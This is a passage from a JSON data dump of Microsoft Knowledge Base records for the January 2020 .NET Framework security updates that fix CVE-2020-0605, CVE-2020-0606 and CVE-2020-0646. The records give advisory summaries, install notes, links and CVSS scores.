[CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532936>) website. 
**File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532936.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532936 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532936", "href": "https://support.microsoft.com/en-us/help/4532936", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:23", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET 
Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532958](<https://support.microsoft.com/help/4532958>) Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4532958) \n * [4532963](<https://support.microsoft.com/help/4532963>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4532963) \n * [4532969](<https://support.microsoft.com/help/4532969>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532969) \n * [4532950](<https://support.microsoft.com/help/4532950>) Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4532950) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4534977)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534977", "href": "https://support.microsoft.com/en-us/help/4534977", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:11", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
\n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532943](<https://support.microsoft.com/help/4532943>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4532943) \n * [4532928](<https://support.microsoft.com/help/4532928>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4532928) \n * [4532930](<https://support.microsoft.com/help/4532930>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532930) \n * [4532939](<https://support.microsoft.com/help/4532939>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4532939) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security 
support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4535103)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535103", "href": "https://support.microsoft.com/en-us/help/4535103", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:38:55", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532935>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532935.csv>). 
\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532935 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532935", "href": "https://support.microsoft.com/en-us/help/4532935", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:38:59", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 3.5 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. 
An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532938>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532938.csv>). 
\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532938 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532938", "href": "https://support.microsoft.com/en-us/help/4532938", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:38:54", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input 
properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532933>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532933.csv>). 
\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532933 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532933", "href": "https://support.microsoft.com/en-us/help/4532933", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:24", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET 
Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n**Important**\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations>)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. 
We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532961](<https://support.microsoft.com/help/4532961>) Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4532961) \n * [4532962](<https://support.microsoft.com/help/4532962>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532962) \n * [4532970](<https://support.microsoft.com/help/4532970>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532970) \n * [4532951](<https://support.microsoft.com/help/4532951>) Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4532951) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4534978)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534978", "href": "https://support.microsoft.com/en-us/help/4534978", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:11", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. 
\n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n**Important**\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations>)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532946](<https://support.microsoft.com/help/4532946>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532946) \n * [4532927](<https://support.microsoft.com/help/4532927>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532927) \n * [4532931](<https://support.microsoft.com/help/4532931>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532931) \n * [4532940](<https://support.microsoft.com/help/4532940>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532940) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and 
Windows Server 2012 R2 (KB4535104)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535104", "href": "https://support.microsoft.com/en-us/help/4535104", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:25", "description": "None\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
